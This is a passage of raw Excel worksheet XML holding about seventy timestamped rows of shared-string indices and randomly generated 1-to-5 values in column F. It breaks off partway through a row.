    <row r="5439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5439" s="1">
        <v>43453.147453703707</v>
      </c>
      <c r="B5439" t="s">
        <v>1305</v>
      </c>
      <c r="C5439" t="s">
        <v>808</v>
      </c>
      <c r="E5439" t="s">
        <v>5071</v>
      </c>
      <c r="F5439">
        <f t="shared" ca="1" si="84"/>
        <v>1</v>
      </c>
    </row>
    <row r="5440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5440" s="1">
        <v>43453.147430555553</v>
      </c>
      <c r="B5440" t="s">
        <v>1305</v>
      </c>
      <c r="C5440" t="s">
        <v>808</v>
      </c>
      <c r="E5440" t="s">
        <v>5071</v>
      </c>
      <c r="F5440">
        <f t="shared" ca="1" si="84"/>
        <v>4</v>
      </c>
    </row>
    <row r="5441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5441" s="1">
        <v>43453.141770833332</v>
      </c>
      <c r="B5441" t="s">
        <v>5</v>
      </c>
      <c r="C5441" t="s">
        <v>5072</v>
      </c>
      <c r="D5441" t="s">
        <v>178</v>
      </c>
      <c r="E5441" t="s">
        <v>4070</v>
      </c>
      <c r="F5441">
        <f t="shared" ca="1" si="84"/>
        <v>3</v>
      </c>
    </row>
    <row r="5442" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A5442" s="1">
        <v>43453.131354166668</v>
      </c>
      <c r="B5442" t="s">
        <v>5</v>
      </c>
      <c r="C5442" t="s">
        <v>124</v>
      </c>
      <c r="E5442" s="2" t="s">
        <v>5073</v>
      </c>
      <c r="F5442">
        <f t="shared" ref="F5442:F5505" ca="1" si="85">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="5443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5443" s="1">
        <v>43453.130312499998</v>
      </c>
      <c r="B5443" t="s">
        <v>5</v>
      </c>
      <c r="C5443" t="s">
        <v>41</v>
      </c>
      <c r="E5443" t="s">
        <v>5074</v>
      </c>
      <c r="F5443">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5444" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5444" s="1">
        <v>43453.128206018519</v>
      </c>
      <c r="B5444" t="s">
        <v>19</v>
      </c>
      <c r="C5444" t="s">
        <v>559</v>
      </c>
      <c r="E5444" s="2" t="s">
        <v>5075</v>
      </c>
      <c r="F5444">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5445" s="1">
        <v>43453.120717592596</v>
      </c>
      <c r="B5445" t="s">
        <v>19</v>
      </c>
      <c r="C5445" t="s">
        <v>808</v>
      </c>
      <c r="E5445" t="s">
        <v>5076</v>
      </c>
      <c r="F5445">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5446" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5446" s="1">
        <v>43453.117650462962</v>
      </c>
      <c r="B5446" t="s">
        <v>35</v>
      </c>
      <c r="C5446" t="s">
        <v>318</v>
      </c>
      <c r="E5446" s="2" t="s">
        <v>5077</v>
      </c>
      <c r="F5446">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5447" s="1">
        <v>43453.112719907411</v>
      </c>
      <c r="B5447" t="s">
        <v>35</v>
      </c>
      <c r="C5447" t="s">
        <v>92</v>
      </c>
      <c r="E5447" t="s">
        <v>5078</v>
      </c>
      <c r="F5447">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5448" s="1">
        <v>43453.106006944443</v>
      </c>
      <c r="B5448" t="s">
        <v>19</v>
      </c>
      <c r="C5448" t="s">
        <v>10</v>
      </c>
      <c r="D5448" t="s">
        <v>46</v>
      </c>
      <c r="E5448" t="s">
        <v>5079</v>
      </c>
      <c r="F5448">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5449" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5449" s="1">
        <v>43453.094641203701</v>
      </c>
      <c r="B5449" t="s">
        <v>13</v>
      </c>
      <c r="C5449" t="s">
        <v>197</v>
      </c>
      <c r="E5449" s="2" t="s">
        <v>5080</v>
      </c>
      <c r="F5449">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5450" s="1">
        <v>43453.070347222223</v>
      </c>
      <c r="B5450" t="s">
        <v>13</v>
      </c>
      <c r="C5450" t="s">
        <v>67</v>
      </c>
      <c r="E5450" t="s">
        <v>5081</v>
      </c>
      <c r="F5450">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5451" s="1">
        <v>43453.067349537036</v>
      </c>
      <c r="B5451" t="s">
        <v>13</v>
      </c>
      <c r="C5451" t="s">
        <v>318</v>
      </c>
      <c r="E5451" t="s">
        <v>5082</v>
      </c>
      <c r="F5451">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5452" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5452" s="1">
        <v>43453.055590277778</v>
      </c>
      <c r="B5452" t="s">
        <v>19</v>
      </c>
      <c r="C5452" t="s">
        <v>139</v>
      </c>
      <c r="E5452" s="2" t="s">
        <v>5083</v>
      </c>
      <c r="F5452">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5453" s="1">
        <v>43453.023414351854</v>
      </c>
      <c r="B5453" t="s">
        <v>19</v>
      </c>
      <c r="C5453" t="s">
        <v>41</v>
      </c>
      <c r="F5453">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5454" s="1">
        <v>43453.004259259258</v>
      </c>
      <c r="B5454" t="s">
        <v>19</v>
      </c>
      <c r="C5454" t="s">
        <v>3443</v>
      </c>
      <c r="E5454" t="s">
        <v>5084</v>
      </c>
      <c r="F5454">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5455" s="1">
        <v>43452.985451388886</v>
      </c>
      <c r="B5455" t="s">
        <v>5</v>
      </c>
      <c r="C5455" t="s">
        <v>73</v>
      </c>
      <c r="E5455" t="s">
        <v>5085</v>
      </c>
      <c r="F5455">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5456" s="1">
        <v>43452.966574074075</v>
      </c>
      <c r="B5456" t="s">
        <v>5</v>
      </c>
      <c r="C5456" t="s">
        <v>10</v>
      </c>
      <c r="D5456" t="s">
        <v>89</v>
      </c>
      <c r="E5456" t="s">
        <v>5086</v>
      </c>
      <c r="F5456">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5457" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A5457" s="1">
        <v>43452.91443287037</v>
      </c>
      <c r="B5457" t="s">
        <v>5</v>
      </c>
      <c r="C5457" t="s">
        <v>5087</v>
      </c>
      <c r="D5457" t="s">
        <v>263</v>
      </c>
      <c r="E5457" s="2" t="s">
        <v>5088</v>
      </c>
      <c r="F5457">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5458" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5458" s="1">
        <v>43452.852430555555</v>
      </c>
      <c r="B5458" t="s">
        <v>13</v>
      </c>
      <c r="C5458" t="s">
        <v>292</v>
      </c>
      <c r="E5458" s="2" t="s">
        <v>5089</v>
      </c>
      <c r="F5458">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5459" s="1">
        <v>43452.774791666663</v>
      </c>
      <c r="B5459" t="s">
        <v>13</v>
      </c>
      <c r="C5459" t="s">
        <v>10</v>
      </c>
      <c r="D5459" t="s">
        <v>271</v>
      </c>
      <c r="E5459" t="s">
        <v>5090</v>
      </c>
      <c r="F5459">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5460" s="1">
        <v>43452.763738425929</v>
      </c>
      <c r="B5460" t="s">
        <v>19</v>
      </c>
      <c r="C5460" t="s">
        <v>10</v>
      </c>
      <c r="D5460" t="s">
        <v>6</v>
      </c>
      <c r="E5460" t="s">
        <v>5091</v>
      </c>
      <c r="F5460">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5461" s="1">
        <v>43452.74690972222</v>
      </c>
      <c r="B5461" t="s">
        <v>19</v>
      </c>
      <c r="C5461" t="s">
        <v>10</v>
      </c>
      <c r="D5461" t="s">
        <v>6</v>
      </c>
      <c r="E5461" t="s">
        <v>5092</v>
      </c>
      <c r="F5461">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5462" s="1">
        <v>43452.738067129627</v>
      </c>
      <c r="C5462" t="s">
        <v>226</v>
      </c>
      <c r="E5462" t="s">
        <v>5093</v>
      </c>
      <c r="F5462">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5463" s="1">
        <v>43452.708113425928</v>
      </c>
      <c r="C5463" t="s">
        <v>10</v>
      </c>
      <c r="D5463" t="s">
        <v>33</v>
      </c>
      <c r="F5463">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5464" s="1">
        <v>43452.706863425927</v>
      </c>
      <c r="B5464" t="s">
        <v>13</v>
      </c>
      <c r="C5464" t="s">
        <v>6</v>
      </c>
      <c r="D5464" t="s">
        <v>25</v>
      </c>
      <c r="E5464" t="s">
        <v>5094</v>
      </c>
      <c r="F5464">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5465" s="1">
        <v>43452.695590277777</v>
      </c>
      <c r="B5465" t="s">
        <v>5</v>
      </c>
      <c r="C5465" t="s">
        <v>10</v>
      </c>
      <c r="D5465" t="s">
        <v>80</v>
      </c>
      <c r="F5465">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5466" s="1">
        <v>43452.690243055556</v>
      </c>
      <c r="B5466" t="s">
        <v>19</v>
      </c>
      <c r="C5466" t="s">
        <v>10</v>
      </c>
      <c r="D5466" t="s">
        <v>330</v>
      </c>
      <c r="E5466" t="s">
        <v>5095</v>
      </c>
      <c r="F5466">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5467" s="1">
        <v>43452.687083333331</v>
      </c>
      <c r="B5467" t="s">
        <v>5</v>
      </c>
      <c r="C5467" t="s">
        <v>60</v>
      </c>
      <c r="E5467" t="s">
        <v>5096</v>
      </c>
      <c r="F5467">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5468" s="1">
        <v>43452.685787037037</v>
      </c>
      <c r="C5468" t="s">
        <v>60</v>
      </c>
      <c r="E5468" t="s">
        <v>5097</v>
      </c>
      <c r="F5468">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5469" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5469" s="1">
        <v>43452.649548611109</v>
      </c>
      <c r="B5469" t="s">
        <v>19</v>
      </c>
      <c r="C5469" t="s">
        <v>10</v>
      </c>
      <c r="D5469" t="s">
        <v>271</v>
      </c>
      <c r="E5469" s="2" t="s">
        <v>5098</v>
      </c>
      <c r="F5469">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5470" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5470" s="1">
        <v>43452.642256944448</v>
      </c>
      <c r="B5470" t="s">
        <v>13</v>
      </c>
      <c r="C5470" t="s">
        <v>10</v>
      </c>
      <c r="D5470" t="s">
        <v>39</v>
      </c>
      <c r="E5470" s="2" t="s">
        <v>5099</v>
      </c>
      <c r="F5470">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5471" s="1">
        <v>43452.626273148147</v>
      </c>
      <c r="B5471" t="s">
        <v>5</v>
      </c>
      <c r="C5471" t="s">
        <v>60</v>
      </c>
      <c r="E5471" t="s">
        <v>5100</v>
      </c>
      <c r="F5471">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5472" s="1">
        <v>43452.622604166667</v>
      </c>
      <c r="C5472" t="s">
        <v>60</v>
      </c>
      <c r="E5472" t="s">
        <v>5101</v>
      </c>
      <c r="F5472">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5473" s="1">
        <v>43452.619432870371</v>
      </c>
      <c r="B5473" t="s">
        <v>19</v>
      </c>
      <c r="C5473" t="s">
        <v>10</v>
      </c>
      <c r="D5473" t="s">
        <v>80</v>
      </c>
      <c r="E5473" t="s">
        <v>5102</v>
      </c>
      <c r="F5473">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5474" s="1">
        <v>43452.618692129632</v>
      </c>
      <c r="B5474" t="s">
        <v>13</v>
      </c>
      <c r="C5474" t="s">
        <v>10</v>
      </c>
      <c r="D5474" t="s">
        <v>381</v>
      </c>
      <c r="E5474" t="s">
        <v>5103</v>
      </c>
      <c r="F5474">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5475" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5475" s="1">
        <v>43452.588449074072</v>
      </c>
      <c r="B5475" t="s">
        <v>13</v>
      </c>
      <c r="C5475" t="s">
        <v>10</v>
      </c>
      <c r="D5475" t="s">
        <v>11</v>
      </c>
      <c r="E5475" s="2" t="s">
        <v>5104</v>
      </c>
      <c r="F5475">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5476" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5476" s="1">
        <v>43452.585358796299</v>
      </c>
      <c r="B5476" t="s">
        <v>13</v>
      </c>
      <c r="C5476" t="s">
        <v>1050</v>
      </c>
      <c r="E5476" s="2" t="s">
        <v>5105</v>
      </c>
      <c r="F5476">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5477" s="1">
        <v>43452.571203703701</v>
      </c>
      <c r="B5477" t="s">
        <v>13</v>
      </c>
      <c r="C5477" t="s">
        <v>10</v>
      </c>
      <c r="D5477" t="s">
        <v>6</v>
      </c>
      <c r="E5477" t="s">
        <v>5106</v>
      </c>
      <c r="F5477">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5478" s="1">
        <v>43452.563819444447</v>
      </c>
      <c r="B5478" t="s">
        <v>19</v>
      </c>
      <c r="C5478" t="s">
        <v>10</v>
      </c>
      <c r="D5478" t="s">
        <v>6</v>
      </c>
      <c r="E5478" t="s">
        <v>5107</v>
      </c>
      <c r="F5478">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5479" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A5479" s="1">
        <v>43452.561469907407</v>
      </c>
      <c r="B5479" t="s">
        <v>13</v>
      </c>
      <c r="C5479" t="s">
        <v>10</v>
      </c>
      <c r="E5479" s="2" t="s">
        <v>5108</v>
      </c>
      <c r="F5479">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5480" s="1">
        <v>43452.554351851853</v>
      </c>
      <c r="B5480" t="s">
        <v>19</v>
      </c>
      <c r="C5480" t="s">
        <v>10</v>
      </c>
      <c r="D5480" t="s">
        <v>480</v>
      </c>
      <c r="E5480" t="s">
        <v>5109</v>
      </c>
      <c r="F5480">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5481" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5481" s="1">
        <v>43452.541307870371</v>
      </c>
      <c r="B5481" t="s">
        <v>19</v>
      </c>
      <c r="C5481" t="s">
        <v>10</v>
      </c>
      <c r="D5481" t="s">
        <v>192</v>
      </c>
      <c r="E5481" s="2" t="s">
        <v>5110</v>
      </c>
      <c r="F5481">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5482" s="1">
        <v>43452.526064814818</v>
      </c>
      <c r="C5482" t="s">
        <v>10</v>
      </c>
      <c r="D5482" t="s">
        <v>163</v>
      </c>
      <c r="F5482">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5483" s="1">
        <v>43452.521678240744</v>
      </c>
      <c r="C5483" t="s">
        <v>60</v>
      </c>
      <c r="E5483" t="s">
        <v>5111</v>
      </c>
      <c r="F5483">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5484" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A5484" s="1">
        <v>43452.512858796297</v>
      </c>
      <c r="B5484" t="s">
        <v>5</v>
      </c>
      <c r="C5484" t="s">
        <v>6</v>
      </c>
      <c r="D5484" t="s">
        <v>25</v>
      </c>
      <c r="E5484" s="2" t="s">
        <v>5112</v>
      </c>
      <c r="F5484">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5485" s="1">
        <v>43452.489062499997</v>
      </c>
      <c r="B5485" t="s">
        <v>19</v>
      </c>
      <c r="C5485" t="s">
        <v>10</v>
      </c>
      <c r="D5485" t="s">
        <v>36</v>
      </c>
      <c r="E5485" t="s">
        <v>5113</v>
      </c>
      <c r="F5485">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5486" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5486" s="1">
        <v>43452.481238425928</v>
      </c>
      <c r="B5486" t="s">
        <v>13</v>
      </c>
      <c r="C5486" t="s">
        <v>260</v>
      </c>
      <c r="E5486" s="2" t="s">
        <v>5114</v>
      </c>
      <c r="F5486">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5487" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A5487" s="1">
        <v>43452.476377314815</v>
      </c>
      <c r="B5487" t="s">
        <v>19</v>
      </c>
      <c r="C5487" t="s">
        <v>43</v>
      </c>
      <c r="E5487" s="2" t="s">
        <v>5115</v>
      </c>
      <c r="F5487">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5488" s="1">
        <v>43452.467951388891</v>
      </c>
      <c r="B5488" t="s">
        <v>13</v>
      </c>
      <c r="C5488" t="s">
        <v>10</v>
      </c>
      <c r="D5488" t="s">
        <v>11</v>
      </c>
      <c r="E5488" t="s">
        <v>5116</v>
      </c>
      <c r="F5488">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5489" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5489" s="1">
        <v>43452.463020833333</v>
      </c>
      <c r="B5489" t="s">
        <v>19</v>
      </c>
      <c r="C5489" t="s">
        <v>559</v>
      </c>
      <c r="E5489" s="2" t="s">
        <v>5117</v>
      </c>
      <c r="F5489">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5490" s="1">
        <v>43452.461377314816</v>
      </c>
      <c r="B5490" t="s">
        <v>5</v>
      </c>
      <c r="C5490" t="s">
        <v>10</v>
      </c>
      <c r="D5490" t="s">
        <v>36</v>
      </c>
      <c r="E5490" t="s">
        <v>5118</v>
      </c>
      <c r="F5490">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5491" s="1">
        <v>43452.455277777779</v>
      </c>
      <c r="B5491" t="s">
        <v>5</v>
      </c>
      <c r="C5491" t="s">
        <v>10</v>
      </c>
      <c r="D5491" t="s">
        <v>251</v>
      </c>
      <c r="E5491" t="s">
        <v>5119</v>
      </c>
      <c r="F5491">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5492" s="1">
        <v>43452.446180555555</v>
      </c>
      <c r="B5492" t="s">
        <v>19</v>
      </c>
      <c r="C5492" t="s">
        <v>10</v>
      </c>
      <c r="D5492" t="s">
        <v>192</v>
      </c>
      <c r="E5492" t="s">
        <v>5120</v>
      </c>
      <c r="F5492">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5493" s="1">
        <v>43452.443182870367</v>
      </c>
      <c r="C5493" t="s">
        <v>301</v>
      </c>
      <c r="E5493" t="s">
        <v>5121</v>
      </c>
      <c r="F5493">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5494" s="1">
        <v>43452.440937500003</v>
      </c>
      <c r="B5494" t="s">
        <v>1305</v>
      </c>
      <c r="C5494" t="s">
        <v>10</v>
      </c>
      <c r="D5494" t="s">
        <v>39</v>
      </c>
      <c r="E5494" t="s">
        <v>5122</v>
      </c>
      <c r="F5494">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5495" s="1">
        <v>43452.422592592593</v>
      </c>
      <c r="B5495" t="s">
        <v>19</v>
      </c>
      <c r="C5495" t="s">
        <v>43</v>
      </c>
      <c r="E5495" t="s">
        <v>5123</v>
      </c>
      <c r="F5495">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5496" s="1">
        <v>43452.407361111109</v>
      </c>
      <c r="C5496" t="s">
        <v>41</v>
      </c>
      <c r="E5496">
        <v>562607372</v>
      </c>
      <c r="F5496">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5497" s="1">
        <v>43452.401423611111</v>
      </c>
      <c r="C5497" t="s">
        <v>301</v>
      </c>
      <c r="E5497" t="s">
        <v>5124</v>
      </c>
      <c r="F5497">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5498" s="1">
        <v>43452.397187499999</v>
      </c>
      <c r="B5498" t="s">
        <v>19</v>
      </c>
      <c r="C5498" t="s">
        <v>41</v>
      </c>
      <c r="E5498" t="s">
        <v>5125</v>
      </c>
      <c r="F5498">
        <f t="shared" ca="1" si="85"/>
        <v>3</v>
      </c>
    </row>
    <row r="5499" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5499" s="1">
        <v>43452.39638888889</v>
      </c>
      <c r="B5499" t="s">
        <v>1305</v>
      </c>
      <c r="C5499" t="s">
        <v>6</v>
      </c>
      <c r="D5499" t="s">
        <v>25</v>
      </c>
      <c r="E5499" s="2" t="s">
        <v>5126</v>
      </c>
      <c r="F5499">
        <f t="shared" ca="1" si="85"/>
        <v>1</v>
      </c>
    </row>
    <row r="5500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5500" s="1">
        <v>43452.384421296294</v>
      </c>
      <c r="B5500" t="s">
        <v>5</v>
      </c>
      <c r="C5500" t="s">
        <v>10</v>
      </c>
      <c r="D5500" t="s">
        <v>151</v>
      </c>
      <c r="E5500" t="s">
        <v>3619</v>
      </c>
      <c r="F5500">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5501" s="1">
        <v>43452.382951388892</v>
      </c>
      <c r="B5501" t="s">
        <v>5</v>
      </c>
      <c r="C5501" t="s">
        <v>10</v>
      </c>
      <c r="D5501" t="s">
        <v>151</v>
      </c>
      <c r="E5501" t="s">
        <v>5127</v>
      </c>
      <c r="F5501">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5502" s="1">
        <v>43452.381909722222</v>
      </c>
      <c r="C5502" t="s">
        <v>71</v>
      </c>
      <c r="E5502" t="s">
        <v>5128</v>
      </c>
      <c r="F5502">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5503" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5503" s="1">
        <v>43452.370347222219</v>
      </c>
      <c r="B5503" t="s">
        <v>5</v>
      </c>
      <c r="C5503" t="s">
        <v>50</v>
      </c>
      <c r="E5503" s="2" t="s">
        <v>5129</v>
      </c>
      <c r="F5503">
        <f t="shared" ca="1" si="85"/>
        <v>4</v>
      </c>
    </row>
    <row r="5504" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A5504" s="1">
        <v>43452.351851851854</v>
      </c>
      <c r="B5504" t="s">
        <v>19</v>
      </c>
      <c r="C5504" t="s">
        <v>623</v>
      </c>
      <c r="E5504" s="2" t="s">
        <v>5130</v>
      </c>
      <c r="F5504">
        <f t="shared" ca="1" si="85"/>
        <v>5</v>
      </c>
    </row>
    <row r="5505" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A5505" s="1">
        <v>43452.351145833331</v>
      </c>
      <c r="B5505" t="s">
        <v>19</v>
      </c>
      <c r="C5505" t="s">
        <v>623</v>
      </c>
      <c r="E5505" s="2" t="s">
        <v>5130</v>
      </c>
      <c r="F5505">
        <f t="shared" ca="1" si="85"/>
        <v>2</v>
      </c>
    </row>
    <row r="5506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5506" s="1">
        <v>43452.347997685189</v>
      </c>
      <c r="C5506" t="s">
        <v>4358</v>
      </c>
      <c r="E5506">
        <v>609236274</v>
      </c>
      <c r="F5506">
        <f t="shared" ref="F5506:F5569" ca="1" si="86">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="5507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5507" s="1">
        <v>43452.338414351849</v>
      </c>
      <c r="B5507" t="s">
        <v>13</v>
      </c>
      <c r="C5507" t="s">
        <v>10</v>
      </c>
      <c r="D5507" t="s">
        <v>192</v>
      </c>
      <c r="E5507" t="s">
        <v>5131</v>
      </c>
      <c r="F5507">
        <f t="shared" ca="1" si="86"/>
        <v>4</v>
      </c>
    </row>
    <row r="5508" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5508" s="1">
        <v>43452.334837962961</v>
      </c>
      <c r="B5508" t="s">
        <v>19</v>
      </c>
      <c r="C5508" t="s">
        <v>71</v>
      </c>
      <c r="E5508" s="2" t="s">
        <v>5132</v>
      </c>
      <c r="F5508">
        <f t="shared" ca="1" si="86"/>
        <v>1</v>
      </c>
    </row>
    <row r="5509" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A5509" s="1">
        <v>43452.324641203704</v>
      </c>
      <c r="B5509" t="s">
        <v>19</v>
      </c>
      <c r="C5509" t="s">
        <v>71</v>
      </c>
      <c r="E5509" s="2" t="s">
        <v>5133</v>
      </c>
      <c r="F5509">
        <f t="shared" ca="1" si="86"/>
        <v>1</v>
      </c>
    </row>
    <row r="5510" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A5510" s="1">
        <v>43452.266724537039</v>
      </c>
      <c r="B5510" t="s">
        <v>35</v>
      </c>
      <c r="C5510" t="s">
        <v>430</v>
      </c>
